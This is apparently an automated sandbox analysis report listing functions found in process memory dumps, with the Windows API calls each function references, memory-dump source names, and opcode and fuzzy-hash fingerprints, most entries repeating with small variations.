Uniqueness

Uniqueness Score: -1.00%

Function 1E014FF0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1E0153B6

Strings

\OM , xrefs: 1E0150B5
lMM , xrefs: 1E015165
\OM , xrefs: 1E0151CD

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: HandleModule
String ID: \OM $\OM $lMM
API String ID: 4139908857-767508554
Opcode ID: 81a2e07f0ff997246b7ef4174a79fbd435adc685acbf2fa866256b69f418a65b
Instruction ID: 91291156d2e76e10463242908815b08685b431c72ecf9e4932d0fb72d46b6854
Opcode Fuzzy Hash: 81a2e07f0ff997246b7ef4174a79fbd435adc685acbf2fa866256b69f418a65b
Instruction Fuzzy Hash: 26C19C74A047458FCB04CFB9C89065EBBF6BF89214B058A6EC806DF761EB75E901CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01046971, Relevance: 3.6, APIs: 2, Instructions: 633libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 010469D5
LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: 69599d5fbf4bb404306a1632cde319dffb8f683cc7b5876ff6fd8d5e0a2c9dcc
Instruction ID: 8b53f7b7037da850dd33949d9e800dc23eed447cc7719bc810285310e1fcdfe8
Opcode Fuzzy Hash: 69599d5fbf4bb404306a1632cde319dffb8f683cc7b5876ff6fd8d5e0a2c9dcc
Instruction Fuzzy Hash: 9D62F6B4A08228CFDB64DF70C89879DB7B6BF48205F1180EAD94AA3354DB359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 010469B8, Relevance: 3.6, APIs: 2, Instructions: 624libraryCOMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 010469D5
LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: DispatcherExceptionInitializeThunkUser
String ID:
API String ID: 243558500-0
Opcode ID: da48189dec22f74b1f19786d46f5edcf0c6c93a79f6205ab71027aa201f3fd67
Instruction ID: f645e15c4ec4da4d22e8faf7bfe5a4347f830c6dd2903b0250c9191a0b251439
Opcode Fuzzy Hash: da48189dec22f74b1f19786d46f5edcf0c6c93a79f6205ab71027aa201f3fd67
Instruction Fuzzy Hash: 8F62F7B4A08228CFDB64DF70C89879DB7B6BF48205F1180EAD94AA3254DF359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1554, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00DB2791,00000800), ref: 00DB2822

Strings

&M , xrefs: 00DB1554

Memory Dump Source

Source File: 00000005.00000002.29202960633.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: &M
API String ID: 1029625771-3272563696
Opcode ID: 606c5887218f3f7ea8968067bae440d49af0066b9e501de43279601b9781d7be
Instruction ID: 9c7d8c79f62480edfd49e40bada49ddfb6b433c5e8b89db15d52debd51786f94
Opcode Fuzzy Hash: 606c5887218f3f7ea8968067bae440d49af0066b9e501de43279601b9781d7be
Instruction Fuzzy Hash: F111D3B6D00249DFCB10CF9AD844AEEFBF4AF98710F14842AE919A7701C774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01046A0C, Relevance: 2.1, APIs: 1, Instructions: 615libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd39d39998aa96525fdb70198b89da4a8256ddc4d6d89642541ee91a81f3c933
Instruction ID: 08ea2dcb002a47a2cebe9b03cd0492d5f1b317d4c1b3f08cb6cfe69db5cb8e00
Opcode Fuzzy Hash: fd39d39998aa96525fdb70198b89da4a8256ddc4d6d89642541ee91a81f3c933
Instruction Fuzzy Hash: F052F6B4A04228CFDB64DF70C89879DB7B6BF88205F1180EAD94AA3254DF359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046A53, Relevance: 2.1, APIs: 1, Instructions: 608libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d5ff48cdbabb56e49dc4569519a8feeaee81c399a71b903e19e4443a60e188f
Instruction ID: 036d0f40b48a210bd2510f3061d6f5f1b177f38bbd44ecb3475144b03e9f6254
Opcode Fuzzy Hash: 1d5ff48cdbabb56e49dc4569519a8feeaee81c399a71b903e19e4443a60e188f
Instruction Fuzzy Hash: E352E7B4A04228CFDB64DF70C89879DB7B6BF88205F1180EAD94AA3254DF359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046A9A, Relevance: 2.1, APIs: 1, Instructions: 599libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 863ead8ff2b1b07c7be3964d746843d79f768b79c004c551f27d385e66e47f81
Instruction ID: 364518fb75273e57713939b6f386c4315061a90000c0890fa69dead65d1895b6
Opcode Fuzzy Hash: 863ead8ff2b1b07c7be3964d746843d79f768b79c004c551f27d385e66e47f81
Instruction Fuzzy Hash: 4152E7B4A04228CFDB64DF70C89879DB7B6BF88205F1180EAD94AA3254DF359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046AD8, Relevance: 2.1, APIs: 1, Instructions: 594libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b656692265081c92680b139e9a5db1319590142552fea2f3786b9f786b0c2db
Instruction ID: e7c3da1dd8cf805e6d429f5eae13df272b0e9aedc8559b6c7c7184f8455330f5
Opcode Fuzzy Hash: 1b656692265081c92680b139e9a5db1319590142552fea2f3786b9f786b0c2db
Instruction Fuzzy Hash: 8E52E7B4A04228CFDB64DF70C89879DB7B6BF88205F1180EAD94AA3254DF359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046B1F, Relevance: 2.1, APIs: 1, Instructions: 587libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 557a103b2f928a139e06b22a13923765ef930cff97cd1abb33bf825596caea66
Instruction ID: 9e289091f1d3c235de8ccbc65436f6157a742d211d4839341dcb9e7405856cfd
Opcode Fuzzy Hash: 557a103b2f928a139e06b22a13923765ef930cff97cd1abb33bf825596caea66
Instruction Fuzzy Hash: 7F52F7B4A04228CFDB64DF70C89879DB7B6BF88205F1180EAD94AA3254DF359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046B66, Relevance: 2.1, APIs: 1, Instructions: 580libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1703a1affc2cb9c0d2375496e04ee16d105800f96995b145050c7f176db8d8f1
Instruction ID: 02238b69a3a47f5377829eb42490e2ea5ade28683a8fc83dc2a3dd659641043e
Opcode Fuzzy Hash: 1703a1affc2cb9c0d2375496e04ee16d105800f96995b145050c7f176db8d8f1
Instruction Fuzzy Hash: A652F8B4A04228CFDB64DF70C89879DB7B5BF48205F1180EAD94AA3354DB359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046BAD, Relevance: 2.1, APIs: 1, Instructions: 571libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0198f8b874fd6f2d8410f614ed916dab7564b7b2e19f039a8591fa8a5688e681
Instruction ID: 8c050531cbd0544beffec4f862c3041313e8008f640a353bfe6c3fcff64857a8
Opcode Fuzzy Hash: 0198f8b874fd6f2d8410f614ed916dab7564b7b2e19f039a8591fa8a5688e681
Instruction Fuzzy Hash: 3542F8B4A04228CFDB64DF70C89879DB7B5BF48205F1180E9D94AA3254DF355E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046BEB, Relevance: 2.1, APIs: 1, Instructions: 566libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdc7e0ae410738dd5a81b481437f25901a935d4be0bbbaaf1ccfc0a6ed2dfba4
Instruction ID: 382f44f4933776568eba9bab024d192a85736d6e8a8548c1d9e6ea888a17979c
Opcode Fuzzy Hash: cdc7e0ae410738dd5a81b481437f25901a935d4be0bbbaaf1ccfc0a6ed2dfba4
Instruction Fuzzy Hash: 0F42F8B4A04228CFDB64DF70C89879DB7B5BF88205F1180EADA4AA3354DB359E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046C32, Relevance: 2.1, APIs: 1, Instructions: 559libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88eab681da2597ab488fb2bd7d1b70494c8ce38be21a731ffc872223ce9fbc14
Instruction ID: 386ea1def23211e239262f69dcbe3b0de69af523c50756d7564df8bb9931d606
Opcode Fuzzy Hash: 88eab681da2597ab488fb2bd7d1b70494c8ce38be21a731ffc872223ce9fbc14
Instruction Fuzzy Hash: 4642E8B4A04228CFDB64DF70C89879DB7B6BF48205F1181EADA4AA3354DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046C79, Relevance: 2.1, APIs: 1, Instructions: 552libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 784dccc9fbf59efd8a700f2445cbcd54a4a8761abea842fcb80dad759f20a6e6
Instruction ID: f9ba01f5b03a7e4f7fb02ba43c3c379383b9d27959cfb9056e7fb990f595bd0b
Opcode Fuzzy Hash: 784dccc9fbf59efd8a700f2445cbcd54a4a8761abea842fcb80dad759f20a6e6
Instruction Fuzzy Hash: AF42E8B4A04228CFDB64DF70C89879DB7B5BF48205F1181EADA4AA3354DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046CC0, Relevance: 2.0, APIs: 1, Instructions: 545libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe51684645f2b8c02acbcd616c1a0cadd93088efb7ce93808036b3f42bfaea2
Instruction ID: d85fc94ff3e430faaae824ca3fa944e4ea85c63e7c28114be6b9d670313ff402
Opcode Fuzzy Hash: bbe51684645f2b8c02acbcd616c1a0cadd93088efb7ce93808036b3f42bfaea2
Instruction Fuzzy Hash: B242E8B4A04228CFDB64DF70C89879DB7B5BF88205F1181EADA4AA3354DB349E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 01046D07, Relevance: 2.0, APIs: 1, Instructions: 538libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: edff4a076adb0bc0f7da178a900dafcbe77beadaca9bd8fb2962302aa26434ee
Instruction ID: f8f337c7d5ab3063b010bd5eb277818d37565f50d625b3e4656f766960a73cad
Opcode Fuzzy Hash: edff4a076adb0bc0f7da178a900dafcbe77beadaca9bd8fb2962302aa26434ee
Instruction Fuzzy Hash: A042E8B4A04228CFDB64DF70C89879DB7B6BF88205F1181E9DA4AA3254DB349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046D4E, Relevance: 2.0, APIs: 1, Instructions: 531libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b957f064790dc844813da159b6a61d4f4f184c27a04d98714b6479838c4c834
Instruction ID: ca2ad05bf77d25ac4d6b1fafad2fb4a6fe723ed64ec33788648fbf9c2bddbd59
Opcode Fuzzy Hash: 1b957f064790dc844813da159b6a61d4f4f184c27a04d98714b6479838c4c834
Instruction Fuzzy Hash: 1942D8B4A04228CFDB64DF70C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046D95, Relevance: 2.0, APIs: 1, Instructions: 522libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 877dc49fa6c9f3d350f91c7ac8fbde3e0b4fd5f70a08c4e3680139a4147e8199
Instruction ID: 0f51d58bd71ef882b9f060ea17e014bce9f3e1a9eed86f2302b1ea6c05f6bae2
Opcode Fuzzy Hash: 877dc49fa6c9f3d350f91c7ac8fbde3e0b4fd5f70a08c4e3680139a4147e8199
Instruction Fuzzy Hash: 5332D8B4A04228CFDB64DF70C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046DD3, Relevance: 2.0, APIs: 1, Instructions: 517libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74524238bbeed51d430d6960b33850b3519796f21695497b02281a13c2b85bf2
Instruction ID: 878f9ae0b2b83a4704877d300c4326771b863c5d21c3cfdbcc5706af40cc8f42
Opcode Fuzzy Hash: 74524238bbeed51d430d6960b33850b3519796f21695497b02281a13c2b85bf2
Instruction Fuzzy Hash: 4B32D7B4A04228CFDB64DF70C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046E1A, Relevance: 2.0, APIs: 1, Instructions: 510libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da94ef2bcd2f0487f20c7de223f5235b7f3f4eef749f7492f1c8b9343038f259
Instruction ID: 55249e1fecd0cb5b2751ec0d6088b180331a707b25be85a02f73c805779eb688
Opcode Fuzzy Hash: da94ef2bcd2f0487f20c7de223f5235b7f3f4eef749f7492f1c8b9343038f259
Instruction Fuzzy Hash: 4332D8B4A04228CFDB64DF70C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046E61, Relevance: 2.0, APIs: 1, Instructions: 503libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a30a7665306e4abee46df9a4408ac9092f9e886be67f49bd18dff9b3f4bd247
Instruction ID: 8068a2cf623f11f8bf3f4a296c34cbf0ef27f966d0228ce6749b677245fd2098
Opcode Fuzzy Hash: 9a30a7665306e4abee46df9a4408ac9092f9e886be67f49bd18dff9b3f4bd247
Instruction Fuzzy Hash: 7B32D7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046EA8, Relevance: 2.0, APIs: 1, Instructions: 496libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6b2cabbafd1e430876ef392b53f709a84ff0565825d3a1870520be305c9214f
Instruction ID: 330e2f368e31012c28121b262950acbe6d5be496b9c5ce66962c4a308a36ec40
Opcode Fuzzy Hash: b6b2cabbafd1e430876ef392b53f709a84ff0565825d3a1870520be305c9214f
Instruction Fuzzy Hash: 8C32D7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046EEF, Relevance: 2.0, APIs: 1, Instructions: 489libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5eb45c631476c09210b08a8fb80285ef5f367b54d1736f45b2b807893615b823
Instruction ID: c95d245c3eb366250ee45452a9d7bab334ff1a224f38af829ba53933a919762b
Opcode Fuzzy Hash: 5eb45c631476c09210b08a8fb80285ef5f367b54d1736f45b2b807893615b823
Instruction Fuzzy Hash: 8232C7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046F36, Relevance: 2.0, APIs: 1, Instructions: 482libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2253e3395835f8e7c4b46e03a3cc07ef94882d4e78f3c88f7f4f9b230b83050e
Instruction ID: 5ea7aaf1d1c4fa200e04c8c5b53b1fc222e1dd49481f540dd3b15ebacf974503
Opcode Fuzzy Hash: 2253e3395835f8e7c4b46e03a3cc07ef94882d4e78f3c88f7f4f9b230b83050e
Instruction Fuzzy Hash: 8E22D8B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046F7D, Relevance: 2.0, APIs: 1, Instructions: 475libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: edf29693f499d5ebf68b85676e76e40a62bbea34641ea3991acd2bee6a1544bb
Instruction ID: cd8843c8391fd86c76e58fe481f8701c3a8ab42f1b3e407d90864e854a9305e7
Opcode Fuzzy Hash: edf29693f499d5ebf68b85676e76e40a62bbea34641ea3991acd2bee6a1544bb
Instruction Fuzzy Hash: 9122D7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01046FC4, Relevance: 2.0, APIs: 1, Instructions: 468libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2e5c58531385aafac16c19baa6b1a8059e00c1c519d2a3a1aab19d65f85f423
Instruction ID: 09040245bcc7db48cb6dab267d9ec5cf538f36a70cb446762ae2ea933c103260
Opcode Fuzzy Hash: f2e5c58531385aafac16c19baa6b1a8059e00c1c519d2a3a1aab19d65f85f423
Instruction Fuzzy Hash: C222D7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0104700B, Relevance: 2.0, APIs: 1, Instructions: 461libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d58083ffdb663c44e1bf5a8482bdd3fd0526c58459fe0a20dd871ba9c6f2689
Instruction ID: cc568d8935dd01da57aa8eec98935c10638a0dde28ed14891aaf032927f493a0
Opcode Fuzzy Hash: 6d58083ffdb663c44e1bf5a8482bdd3fd0526c58459fe0a20dd871ba9c6f2689
Instruction Fuzzy Hash: F522D7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01047052, Relevance: 2.0, APIs: 1, Instructions: 452libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9dc45dfec063576e19650f9a043246d89c3461164a828ef2894be5ad72d154b8
Instruction ID: 9f12246aa11758ef3b74d3aee7305cc4a889b636dc6bd22665f4da3d301a1847
Opcode Fuzzy Hash: 9dc45dfec063576e19650f9a043246d89c3461164a828ef2894be5ad72d154b8
Instruction Fuzzy Hash: F522D7B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01047090, Relevance: 1.9, APIs: 1, Instructions: 447libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010471E1

Memory Dump Source

Source File: 00000005.00000002.29203229128.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a22dc564c653ed8aeb0d7274dc4c714ac371b0855a6702fdae6758b988bcca8
Instruction ID: 53142dfcb1c0e903205ae0923d6119948a343c6d50c571ad63056654e7c3bae9
Opcode Fuzzy Hash: 8a22dc564c653ed8aeb0d7274dc4c714ac371b0855a6702fdae6758b988bcca8
Instruction Fuzzy Hash: C122D6B4A04228CFDB64DF74C89879DB7B6BF88205F1185E9DA0AA3254DF349E81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01738078, Relevance: 1.7, APIs: 1, Instructions: 233libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01738161

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: acb6feeed10a2bf6179d1b66429e13d747097a9b1f1d80bcf216e026d1cee959
Instruction ID: 62af883bf8900928fe7c308982e0f8e49087b22b6c841fb88382413c0de89d5e
Opcode Fuzzy Hash: acb6feeed10a2bf6179d1b66429e13d747097a9b1f1d80bcf216e026d1cee959
Instruction Fuzzy Hash: AE81A070A00219DFDB14DBB8C4987AEBBF2AFC4304F148929E405AB395DF759D45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01366690, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013666F1

Memory Dump Source

Source File: 00000005.00000002.29205527303.0000000001360000.00000040.00000010.sdmp, Offset: 01360000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7147fed68812a57df3c4b9ac4a808dddb2ff8d37374088b97221b9efc73c385a
Instruction ID: fcb294d68d3c4c25dbf50a3ffbc5d680fb9801cb1b374d2453d44c8b98950421
Opcode Fuzzy Hash: 7147fed68812a57df3c4b9ac4a808dddb2ff8d37374088b97221b9efc73c385a
Instruction Fuzzy Hash: A0518071A002099BCB04EBB4C899A9EB7F9FF89244F158969E5029B254EF70ED04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0173A030, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdde12fd6deeed6639ead53e25b98d5af9c1c244c0f63a35ddc83fbe750033e6
Instruction ID: 1cb1e236835d1a176afad21d85e4705eb0ff64f575106839c791dec78400f18f
Opcode Fuzzy Hash: bdde12fd6deeed6639ead53e25b98d5af9c1c244c0f63a35ddc83fbe750033e6
Instruction Fuzzy Hash: 72411071E047459FCB10CFA9D8046EAFBF4EFC9210F15866AD408A7251EB78A881CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1E0167ED, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E01690A

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 74249960bd923df8834bed2b9f1204897f5ca99e4b9f65ebfb91ae908b29a5fe
Instruction ID: f2684e604374cc93057e7b66cd6bfe16997d864a634d64200dba81fee7de31de
Opcode Fuzzy Hash: 74249960bd923df8834bed2b9f1204897f5ca99e4b9f65ebfb91ae908b29a5fe
Instruction Fuzzy Hash: 3C51E2B1D00349DFDB14CFA9D884ADEBFB5BF88310F24822AE815AB250D7719981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E014674, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E01690A

Memory Dump Source

Source File: 00000005.00000002.29215241219.000000001E010000.00000040.00000001.sdmp, Offset: 1E010000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7dbe46aa0a41ae1c2667e270c7692fac192825e624c23b71b83073d233a8f0bb
Instruction ID: 95a92b2a4e1ad3f17db8d1c93f9a61e44a6cebc02a4a1cba205cf1938b2433ea
Opcode Fuzzy Hash: 7dbe46aa0a41ae1c2667e270c7692fac192825e624c23b71b83073d233a8f0bb
Instruction Fuzzy Hash: 5D51D0B1D00349DFDB14CF9AD880ADEBBB5BF48310F60822AE819AB210D771A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01738EF8, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0173900C

Memory Dump Source

Source File: 00000005.00000002.29206611401.0000000001730000.00000040.00000010.sdmp, Offset: 01730000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f8db740b9a93c2e9e8f93ee1a3add184bf69cbcf40628c3622db0625de299bbc
Instruction ID: 08fda81b7ec6f81e83d79285fe523805ae81e5ca444cf0baf049c5d336a5668a
Opcode Fuzzy Hash: f8db740b9a93c2e9e8f93ee1a3add184bf69cbcf40628c3622db0625de299bbc
Instruction Fuzzy Hash: B14169B0D042498FDB10CFA9C544B9EFFF5BF88304F24856AE508AB352D7759945CB91

Uniqueness

Uniqueness Score: -1.00%

